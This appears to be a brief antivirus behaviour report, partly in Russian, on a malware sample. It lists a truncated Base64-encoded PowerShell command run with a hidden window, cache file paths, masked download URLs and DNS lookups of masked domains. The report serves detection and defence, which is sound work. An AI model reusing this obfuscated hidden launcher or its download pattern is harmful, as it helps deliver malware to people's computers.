Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEkAQwBNAFkAcgBmAHMAPQAnAEUAQgBRAFYATQB2AHEAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAHkAYABQAFIATwBUAGAATwBjAG8ATAAiACAAPQAgAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://se####netit.com.au/colinj/kY6FzALr9/
- http://su##aga.jp/yamanami/Rubzr3/
- http://la#####oruldeganduri.ro/wp-admin/dF238/
- DNS ASK sa###eb.com.br
- DNS ASK se####netit.com.au
- DNS ASK su##aga.jp
- DNS ASK le##2019.tk
- DNS ASK la#####oruldeganduri.ro
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABHAEkAQwBNAFkAcgBmAHMAPQAnAEUAQgBRAFYATQB2AHEAaQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAHkAYABQAFIATwBUAGAATwBjAG8ATAAiACAAPQAgAC...' (со скрытым окном)